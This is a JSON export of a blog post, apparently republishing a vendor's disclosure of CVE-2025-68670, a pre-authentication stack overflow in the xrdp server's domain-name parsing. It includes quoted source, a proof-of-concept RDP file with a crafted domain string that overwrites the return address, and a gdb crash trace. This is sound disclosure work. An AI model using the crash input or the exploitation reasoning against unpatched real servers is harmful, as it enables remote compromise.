{"id":2972,"date":"2026-05-08T08:04:25","date_gmt":"2026-05-08T08:04:25","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/"},"modified":"2026-05-08T08:04:25","modified_gmt":"2026-05-08T08:04:25","slug":"cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/","title":{"rendered":"CVE-2025-68670: discovering an RCE vulnerability in xrdp"},"content":{"rendered":"<div>\n<p><img loading=\"lazy\" width=\"990\" height=\"400\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg\" class=\"attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image\" alt=\"\" decoding=\"async\"><\/p>\n<p>In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of <a href=\"https:\/\/os.kaspersky.com\/solutions\/kaspersky-thin-client\/?icid=gl_sl_thin-client-lnk_sm-team_7832f7d2a73c7e57\" target=\"_blank\" rel=\"noopener\">Kaspersky Thin Client<\/a>, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session \u2013 all while maintaining connection security.<\/p>\n<p>We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2025-68670\" target=\"_blank\" rel=\"noopener\">CVE-2025-68670<\/a>. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/security\/advisories\/GHSA-rwvg-gp87-gh6f\" target=\"_blank\" rel=\"noopener\">security bulletin<\/a>. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.<\/p>\n<h2 id=\"client-data-transmission-via-rdp\">Client data transmission via RDP<\/h2>\n<p>Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/common\/xrdp_client_info.h#L128C1-L156C44\" target=\"_blank\" rel=\"noopener\">as follows<\/a>:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">{\r\n[..SNIP..]\r\nchar username[INFO_CLIENT_MAX_CB_LEN];\r\nchar password[INFO_CLIENT_MAX_CB_LEN];\r\nchar domain[INFO_CLIENT_MAX_CB_LEN];\r\nchar program[INFO_CLIENT_MAX_CB_LEN];\r\nchar directory[INFO_CLIENT_MAX_CB_LEN];\r\n[..SNIP..]\r\n}<\/pre>\n<p>The value of the <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/common\/xrdp_constants.h#L72C1-L72C36\" target=\"_blank\" rel=\"noopener\">INFO_CLIENT_MAX_CB_LEN<\/a> constant corresponds to the maximum string length and is defined as follows:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">#define INFO_CLIENT_MAX_CB_LEN 512<\/pre>\n<p>When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/libxrdp\/xrdp_sec.c#L562C9-L562C121\" target=\"_blank\" rel=\"noopener\">converts the data to UTF-8<\/a> before saving it.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">if (ts_info_utf16_in( \/\/ [1]\r\n            s, len_domain, self-&gt;rdp_layer-&gt;client_info.domain, sizeof(self-&gt;rdp_layer-&gt;client_info.domain)) != 0) \/\/ [2]\r\n{\r\n[..SNIP..]\r\n}<\/pre>\n<p>The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/libxrdp\/xrdp_sec.c#L353C1-L386C2\" target=\"_blank\" rel=\"noopener\">implements buffer overflow protection<\/a> [3].<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)\r\n{\r\n   int rv = 0;\r\n   LOG_DEVEL(LOG_LEVEL_TRACE, \"ts_info_utf16_in: uni_len %d, dst_len %d\", src_bytes, dst_len);\r\n   if (!s_check_rem_and_log(s, src_bytes + 2, \"ts_info_utf16_in\"))\r\n   {\r\n       rv = 1;\r\n   }\r\n   else\r\n   {\r\n       int term;\r\n       int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes \/ 2,\r\n                                                 dst, dst_len); \r\n       if (num_chars &gt; dst_len) \/\/ [3]\r\n       {\r\n           LOG(LOG_LEVEL_ERROR, \"ts_info_utf16_in: output buffer overflow\"); rv = 1;\r\n       }\r\n       \/ \/ String should be null-terminated. We haven't read the terminator yet\r\n       in_uint16_le(s, term);\r\n       if (term != 0)\r\n       {\r\n           LOG(LOG_LEVEL_ERROR, \"ts_info_utf16_in: bad terminator. Expected 0, got %d\", term);\r\n           rv = 1;\r\n       }\r\n   }\r\n   return rv;\r\n}<\/pre>\n<p>Next, the <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/common\/parse.c#L196C1-L255C2\" target=\"_blank\" rel=\"noopener\">in_utf16_le_fixed_as_utf8_proc<\/a> function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">{\r\n   unsigned int rv = 0;\r\n   char32_t c32;\r\n   char u8str[MAXLEN_UTF8_CHAR];\r\n   unsigned int u8len;\r\n   char *saved_s_end = s-&gt;end;\r\n\r\n   \/\/ Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK\r\n   parser_stream_overflow_check(s, n * 2, 0, file, line); #endif\r\n   \/\/ Temporarily set the stream end pointer to allow us to use\r\n   \/\/ s_check_rem() when reading in UTF-16 words\r\n   if (s-&gt;end - s-&gt;p &gt; (int)(n * 2))\r\n   {\r\n       s-&gt;end = s-&gt;p + (int)(n * 2);\r\n   }\r\n\r\n   while (s_check_rem(s, 2))\r\n   {\r\n       c32 = get_c32_from_stream(s);\r\n       u8len = utf_char32_to_utf8(c32, u8str);\r\n       if (u8len + 1 &lt;= vn) \/\/ [4]\r\n       {\r\n           \/* Room for this character and a terminator. Add the character *\/\r\n           unsigned int i;\r\n           for (i = 0 ; i &lt; u8len ; ++i)\r\n           {\r\n               v[i] = u8str[i];\r\n           }\r\n\r\n           v n -= u8len;\r\n           v += u8len;\r\n       }\r\n\r\n       else if (vn &gt; 1)\r\n       {\r\n           \/* We've skipped a character, but there's more than one byte\r\n           * remaining in the output buffer. Mark the output buffer as\r\n           * full so we don't get a smaller character being squeezed into\r\n           * the remaining space *\/\r\n           vn = 1;\r\n       }\r\n\r\n       r v += u8len;\r\n   }\r\n   \/\/ Restore stream to full length s-&gt;end = saved_s_end;\r\n   if (vn &gt; 0)\r\n   {\r\n       *v = '\u0000'; \/\/ [5]\r\n   }\r\n   + +rv;\r\n   return rv;\r\n}<\/pre>\n<p>Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.<\/p>\n<h2 id=\"cve-2025-68670-an-rce-vulnerability-in-xrdp\">CVE-2025-68670: an RCE vulnerability in xrdp<\/h2>\n<p>The vulnerability exists within the <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/xrdp\/xrdp_login_wnd.c#L306C1-L360C2\" target=\"_blank\" rel=\"noopener\">xrdp_wm_parse_domain_information<\/a> function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,\r\n     int decode, char *resultBuffer)\r\nxrdp_login_wnd_create(struct xrdp_wm *self)\r\nxrdp_wm_init(struct xrdp_wm *self)\r\nxrdp_wm_login_state_changed(struct xrdp_wm *self)\r\nxrdp_wm_check_wait_objs(struct xrdp_wm *self)\r\nxrdp_process_main_loop(struct xrdp_process *self)<\/pre>\n<p>The code snippet where the vulnerable function is called <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/xrdp\/xrdp_login_wnd.c#L1001C5-L1004C83\" target=\"_blank\" rel=\"noopener\">looks like this<\/a>:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">char resultIP[256]; \/\/ [7]\r\n[..SNIP..]\r\ncombo-&gt;item_index = xrdp_wm_parse_domain_information(\r\n    self-&gt;session-&gt;client_info-&gt;domain, \/\/ [6]\r\n    combo-&gt;data_list-&gt;count, 1,\r\n    resultIP \/* just a dummy place holder, we ignore\r\n*\/ );<\/pre>\n<p>As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let\u2019s look at exactly what the <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/xrdp\/xrdp_login_wnd.c#L306C1-L360C2\" target=\"_blank\" rel=\"noopener\">vulnerable function<\/a> does with these arguments.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">static int\r\nxrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,\r\n                                                              int decode, char *resultBuffer)\r\n{\r\n    int ret;\r\n    int pos;\r\n    int comboxindex;\r\n    char index[2];\r\n\r\n    \/* If the first char in the domain name is '_' we use the domain name as IP*\/\r\n    ret = 0; \/* default return value *\/\r\n    \/* resultBuffer assumed to be 256 chars *\/\r\n    g_memset(resultBuffer, 0, 256);\r\n    if (originalDomainInfo[0] == '_') \/\/ [8]\r\n    {\r\n        \/* we try to locate a number indicating what combobox index the user\r\n         * prefer the information is loaded from domain field, from the client\r\n         * We must use valid chars in the domain name.\r\n         * Underscore is a valid name in the domain.\r\n         * Invalid chars are ignored in microsoft client therefore we use '_'\r\n         * again. this sec '__' contains the split for index.*\/\r\n        pos = g_pos(&amp;originalDomainInfo[1], \"__\"); \/\/ [9]\r\n        if (pos &gt; 0)\r\n        {\r\n            \/* an index is found we try to use it *\/\r\n            LOG(LOG_LEVEL_DEBUG, \"domain contains index char __\");\r\n            if (decode)\r\n            {\r\n                [..SNIP..]\r\n            }\r\n            \/ * pos limit the String to only contain the IP *\/\r\n            g_strncpy(resultBuffer, &amp;originalDomainInfo[1], pos); \/\/ [10]\r\n        }\r\n        else\r\n        {\r\n            LOG(LOG_LEVEL_DEBUG, \"domain does not contain _\");\r\n            g_strncpy(resultBuffer, &amp;originalDomainInfo[1], 255);\r\n        }\r\n    }\r\n    return ret;\r\n}<\/pre>\n<p>As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name\u00a0\u2013 starting from the second character and ending with the double underscore (\u201c__\u201d)\u00a0\u2013 is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it\u2019s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker\u2019s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).<\/p>\n<p>To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial \u201c_\u201d and the subsequent \u201c__\u201d. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.<\/p>\n<h2 id=\"poc\">PoC<\/h2>\n<p>As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server\u2019s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string \u201cAAAAAAAA\u201d. The contents of the RDP file are shown below:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">alternate full address:s:172.22.118.7\r\nfull address:s:172.22.118.7\r\ndomain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0\r\nusername:s:testuser<\/pre>\n<p>When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">gef\u27a4 bt\r\n#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at .\/nptl\/pthread_kill.c:44\r\n#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at .\/nptl\/pthread_kill.c:78\r\n#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at.\/nptl\/pthread_kill.c:89\r\n#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ..\/sysdeps\/posix\/raise.c:26\r\n#4 0x00007adb2da287f3 in __GI_abort () at .\/stdlib\/abort.c:79\r\n#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e \"*** %s ***: terminatedn\") at ..\/sysdeps\/posix\/libc_fatal.c:156\r\n#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 \"stack smashing detected\") at .\/debug\/fortify_fail.c:26\r\n#7 0x00007adb2db365d6 in __stack_chk_fail () at .\/debug\/stack_chk_fail.c:24\r\n#8 0x000063654a2e5ad5 in ?? ()\r\n#9 0x4141414141414141 in ?? ()\r\n#10 0x00007adb00000a00 in ?? ()\r\n#11 0x0000000000050004 in ?? ()\r\n#12 0x00007fff91732220 in ?? ()\r\n#13 0x000000000000030a in ?? ()\r\n#14 0xfffffffffffffff8 in ?? ()\r\n#15 0x000000052dc71740 in ?? ()\r\n#16 0x3030305f70647278 in ?? ()\r\n#17 0x616d5f6130333030 in ?? ()\r\n#18 0x00636e79735f6e69 in ?? ()\r\n#19 0x0000000000000000 in ?? ()<\/pre>\n<\/p>\n<h2 id=\"protection-against-vulnerability-exploitation\">Protection against vulnerability exploitation<\/h2>\n<p>It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.<\/p>\n<p><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701.png\" class=\"magnificImage\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-full wp-image-119743\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701.png\" alt=\"\" width=\"1282\" height=\"1012\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701.png 1282w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-300x237.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-1024x808.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-768x606.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-443x350.png 443w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-740x584.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-355x280.png 355w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/06205923\/cve-2025-686701-800x632.png 800w\" sizes=\"(max-width: 1282px) 100vw, 1282px\"><\/a><\/p>\n<p>The vulnerable function is also referenced by the <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/blob\/43a0c91aa2ea1d72c8ec0a08f8017e586b700dfc\/xrdp\/xrdp_login_wnd.c#L487\" target=\"_blank\" rel=\"noopener\">xrdp_wm_show_edits<\/a> function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.<\/p>\n<p>Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers <a href=\"https:\/\/github.com\/neutrinolabs\/xrdp\/security\/advisories\/GHSA-rwvg-gp87-gh6f\" target=\"_blank\" rel=\"noopener\">advise against<\/a> relying solely on stack canaries when using the project.<\/p>\n<h2 id=\"vulnerability-remediation-timeline\">Vulnerability remediation timeline<\/h2>\n<ul>\n<li>12\/05\/2025: we submitted the vulnerability report via https:\/\/github.com\/neutrinolabs\/xrdp\/security.<\/li>\n<li>12\/05\/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.<\/li>\n<li>12\/15\/2025: investigation and prioritization of the vulnerability began.<\/li>\n<li>12\/18\/2025: the maintainers confirmed the vulnerability and began developing a patch.<\/li>\n<li>12\/24\/2025: the vulnerability was assigned the identifier CVE-2025-68670.<\/li>\n<li>01\/27\/2026: the patch was merged into the project\u2019s main branch.<\/li>\n<\/ul>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions\u00a0\u2013 such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway\u00a0\u2013 led to the <a href=\"https:\/\/securelist.com\/suricata-freerdp-memory-corruption\/113489\/\" target=\"_blank\" rel=\"noopener\">discovery of several vulnerabilities<\/a> in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.<\/p>\n<p>However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90,44,907,1130,242,241,759,1131],"tags":[91],"class_list":["post-2972","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","category-linux","category-open-source","category-rdp","category-vulnerabilities","category-vulnerabilities-and-exploits","category-vulnerability-reports","category-xrdp","tag-cybersecurity"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CVE-2025-68670: discovering an RCE vulnerability in xrdp - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2025-68670: discovering an RCE vulnerability in xrdp - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-08T08:04:25+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"CVE-2025-68670: discovering an RCE vulnerability in xrdp\",\"datePublished\":\"2026-05-08T08:04:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\"},\"wordCount\":1262,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\",\"linux\",\"Open source\",\"RDP\",\"Vulnerabilities\",\"Vulnerabilities and exploits\",\"Vulnerability reports\",\"xrdp\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\",\"name\":\"CVE-2025-68670: discovering an RCE vulnerability in xrdp - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg\",\"datePublished\":\"2026-05-08T08:04:25+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage\",\"url\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg\",\"contentUrl\":\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2025-68670: discovering an RCE vulnerability in xrdp\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2025-68670: discovering an RCE vulnerability in xrdp - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2025-68670: discovering an RCE vulnerability in xrdp - Imperative Business Ventures Limited","og_description":"In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, [&hellip;]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-05-08T08:04:25+00:00","og_image":[{"url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written 